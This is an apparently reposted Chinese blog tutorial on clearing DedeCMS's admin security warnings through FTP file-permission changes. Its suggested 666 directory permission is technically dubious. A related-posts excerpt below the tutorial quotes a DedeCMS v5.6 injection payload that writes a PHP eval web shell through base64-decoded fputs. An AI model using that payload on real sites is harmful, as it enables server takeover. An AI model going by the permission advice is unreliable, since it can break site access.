解决织梦后台"DEDECMS安全提示"

于 2022-01-03 18:59:04 发布
阅读量224 收藏
点赞数
分类专栏: 织梦dede模板修改 cms常见故障 文章标签: php
原文链接:http://www.dede58.com/a/dedeaz/4148.html
版权

   织梦后台系统是目前被采用最多的网站CMS,很多SEOer都操作过织梦后台,那么细心的网络营销人员就会发现,在后台首页有一个版块叫“DEDECMS安全提示”,里面写了3条提示(如图1):

1、目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限!

2、强烈建议data/common.inc.php文件属性设置为644(Linux/Unix)或只读(NT)。

3、强烈建议将data目录搬移到Web根目录以外。

DEDECMS案例

(此图片来源于网络,如有侵权,请联系删除! )

       对于没有经验的网络营销人员来讲,初看这3条,有点莫不着头脑,不过没关系,笔者接下来分享一下解决这个难题的方法:

       先看第1条:目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限!我们先登录FTP软件(以FLASH-FXP为例),如笔者这个网站http://www.***.com,先进入到网站根目录,找到“data”和“uploads”这两个文件夹。然后我们看data这个文件夹,我们鼠标放上去,点右键,选择“属性”,紧接着会出现一个对话框,把里面三个“执行”前面的钩去掉,对话框最底下显示“666权限”即修改成功(如图2)。用同样的方法修改文件夹“uploads”的属性,第1条就解决了。

修改文件夹执行权限示例图

(此图片来源于网络,如有侵权,请联系删除! )

       再来看第2条:强烈建议data/common.inc.php文件属性设置为644(Linux/Unix)或只读(NT)。我们进入data文件夹找到common.inc.php,这个文件是网站数据库配置文件,非常重要。我们同样点右键选择“属性”,弹出对话框,去掉“组”和“公共”的“写入”权限前面的钩,再把三个属性里面的“执行”权限前面的钩去掉,就可以获得“644权限”(如图3),完毕。

644权限

(此图片来源于网络,如有侵权,请联系删除! )

       第3条:强烈建议将data目录搬移到Web根目录以外。我们先在根目录以外建立一个同名的文件夹:data。然后回到网站根目录,找到根目录里面的data文件夹,右键选择“移动”,即可实现搬移,等搬移完毕后,我们再把根目录里的data空文件夹删除,刷新FTP软件,就OK了。

二胖的窝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
织梦dedecms网站首页标题被恶意非法篡改乱码解决办法!!
威小胖的博客
12-15 2053
dedecms被篡改问题让很多人头疼,还有的网站毒了会跳转到BC网站,赌博、彩票网站上去了,网站在百度搜索出现:百度网址安全心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡… 近期,我的诸多客户的网站同时被黑客攻击,症状都是网站首页标题TDK被非法篡改,在dede后台更新下首页可以恢复正常,没过多久又会自动非法篡改,而且还是加密乱码。 通过站长工具SEO检测工具,网站标题和关键词竟然...
织梦后台管理漂亮的界面优化UI源码
12-05
织梦后台管理漂亮的界面优化UI源码】是一款专为织梦内容管理系统(DedeCMS)设计的美化和优化工具,旨在提升用户在后台管理时的视觉体验和操作效率。这款源码集美观与实用性于一体,让后台界面更加整洁、大气,...
如何修改"DEDECMS 提示信息!"方法!
黑猫警长博客
04-25 1178
dedecms程序使用过程,经常有一些跳转提示信息会出现“DEDECMS 提示信息!”这几个字样。 很多朋友都想对他进行修改,改为自己网站的提示信息,其实方法也是很简单的,方法如下: 用编辑器打开include/common.func.php文件,查找“DEDECMS”,你会发现有两次 DEDECMS提示信息,在那两处提示信息的位置修改为你想要的提示信息即可,如:BadCat提示
dede网站首页被黑攻击植入恶意跳转代码怎么办? 首页经常被篡改标题关键字的解决方法
qq_36746815的博客
04-27 4109
网站title被加入代码: 首先,我们要先修复首页代码解决跳转问题,避免更多用户跳转到恶意页面,也是避免网站被篡改后的tdk被搜索引擎收录! 然后我们先解决对方通过自定义宏标记和智能标记向导来篡改首页代码的问题,我们可以删除后台目录(默认是dede文件夹)下的: mytag_add.php、 mytag_edit.php、 mytag_main.php、 mytag_t...
DedeCms v5.6 嵌入恶意代码执行漏洞
Yatere的天平秤
04-25 1214
上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz
织梦Dedecms容易被挂马文件以及可疑文件汇总
滴水石穿
03-11 644
1. 被植入木马,然后网站打开后自动弹出博彩,赌博,色情网站,一般这种病毒的特征代码如下 二、织梦CMS被挂马清理方法 1、删除增加的管理员service、spider等用户名。 2、删除根目录的asdd、90sec、service等PHP文件。 3、删除plus目录的以下可疑文件: 4、织梦程序后台扫描提示名字为90sec的PHP文件,可以在后台->模板->自定义...
织梦后台密码重置
09-05
本篇文章将详细讲解如何通过织梦后台密码重置功能来解决这一问题。 首先,当你无法记得织梦后台的登录密码时,不要慌张。织梦系统提供了一个便捷的方法来恢复密码。这个方法涉及到上传特定的文件到服务器,然后通过...
织梦dedecms短信插件_短信设置说明方法
10-14
"织梦dedecms短信插件"是专门为DEDECMS系统设计的一个功能扩展,它提供了手机号码验证的功能,增强了用户注册和登录的安全性。下面将详细介绍这个插件的功能、设置方法以及安装步骤。 ### 功能详解 1. **手机号...
全新写的织梦的管理后台大气精美自适应
07-05
而"GBK2312织梦后台"和"UTF8织梦后台"可能分别代表了两种不同的字符编码版本,GBK2312是国大陆常用的汉字编码标准,UTF8则是国际通用的多语言编码方式,这两个版本的后台可能针对不同的字符集需求,确保了在处理...
管理后台UI.rar_dedecms_dedecms后台新样式_dedecms和ui
最新发布
09-24
【标签】"dedecms dedecms后台新样式 dedecms和ui" 进一步强调了这个压缩包的内容,"dedecms" 是系统名,"后台新样式" 提示我们这是关于后台界面的更新,而 "dedecms和ui" 指出这个更新与系统的用户界面(UI)设计...
网站php执行权限,取消网站文件目录脚本执行权限的方法步骤
weixin_36081187的博客
03-11 525
今天,在登录网站后台时,发现一个DedeCMS安全提示:目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限!如下图所示:对于网站安全维护的过程,目录的执行权限是非常敏感的,一般来说,可以写入的目录是不能够拥有脚本的执行权限的,像DedeCMS系统,可写入的有两个目录,既:data文件和uploads文件。data目录主要是基本配置文件和缓存数据,uploads则...
织梦php无法编辑,织梦dedecms使用ftp无法修改data/common.inc.php文件属性
weixin_42373066的博客
03-24 337
本人在使用织梦dedecms建设网站的过程,发现一个非常奇怪的问题,后台出现安全提示:强烈建议data/common.inc.php文件属性设置为644(Linux/Unix)或只读(NT);本人按照提示使用ftp对文件权限进行修改,但是修改过后,在后台刷新一下,还是会出现修改common.inc.php文件属性的提示。在ftp刷新一下,发现此文件的属性又变为777。本人又重新修改了一下,还是会...
织梦系统解决后台DEDECMS安全提示”的方法
PHP错误汇总
12-31 222
织梦后台系统是目前被采用最多的网站CMS,很多SEOer都操作过织梦后台,那么细心的网络营销人员就会发现,在后台首页有一个版块叫“DEDECMS安全提示”,里面写了3条提示(如图1): 1、目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限! 2、强烈建议data/common.inc.php文件属性设置为644(Linux/Unix)或只读(NT)。 3、强烈建议将data目录搬移到Web根目录以外。 (此图片来源于网络,如有侵权,请联系删除! ) 对于
网站一直被篡改首页文件index以及indax怎么办
网站安全专家
03-16 6438
近期发现公司网站首页文件经常被篡改为indax.php或indax.html,导致网站的功能无法正常使用,百度搜索关键词,在显示结果点击公司网站,打开后跳转到别的网站上去了,尤其我们在百度做的推广,导致客户无法访问到我们公司网站上,给公司带来很大的影响,领导让尽快解决这个问题。这样的问题已经连续出现3次了找了建站公司也没有解决,反复篡改首页,比如今天我把文件删除替换掉后本地的备份文件,第二天立马...
目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限
penjie0418的专栏
07-06 9671
1.目前data、uploads有执行.php权限,非常危险,需要立即取消目录的执行权限! 2.强烈建议data/common.inc.php文件属性设置为644(Linux/Unix)或只读(NT); 3.强烈建议将data目录搬移到Web根目录以外; 对于这三个问题,相信很多站长都很头痛。即使织梦官方也有不少教程,但看得明白的没有多少。百度了很久没有找到好的答案,我也是菜鸟,弄了一个
dedecms安全漏洞之/include/common.inc.php漏洞解决办法
qq_31763129的博客
04-26 4898
1.受影响版本DEDECMS 5.7、5.6、5.5。 2.漏洞文件/include/common.inc.php 3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。描述:目标存在全局变量覆盖漏洞。1.受影响版本DEDECMS 5.7、5.6、5.5。2.漏洞文件/include/common.inc.php3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。...
linux 取消目录php脚本执行权限
收集盒 Book box
08-06 1110
假设取消web 目录uploads的php脚本执行权限, 网站根目录是/var/www/blog。 针对 apache : Order allow,deny Deny from all 针对 nginx : location ~ ^/upload/.*\.(php|php5)$ { deny all; } 简单写个php文件测试如下: Forbidden Yo
织梦php首页老是自动恢复,织梦common.inc.php文件属性设置为644后又自动变回777的有效解决方法(已验证)...
weixin_33614878的博客
03-12 416
万维景盛工程师在为安心主机客户进行织梦站点安全配置时,曾遇到dedecms织梦后台提示:"强烈建议data/common.inc.php文件属性设置为644(Linux/Unix)或只读(NT);"这个警告的问题,通过一般的手法将common.inc.php这个文件属性改为644或444后,一刷新验证后台,文件属性又自动变回777。查询网上的解决方案,大抵有以下几种方案:1、到/templets/...
织梦dedecms建站详细教程.doc
01-12
在后续的教程,可能会涵盖如何使用DedeCMS后台管理网站、创建和编辑页面、设置模板、管理文章、添加和管理栏目、SEO优化、安全设置等方面的知识。学习并熟练掌握这些内容,将使你能够高效地利用DedeCMS构建和维护...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值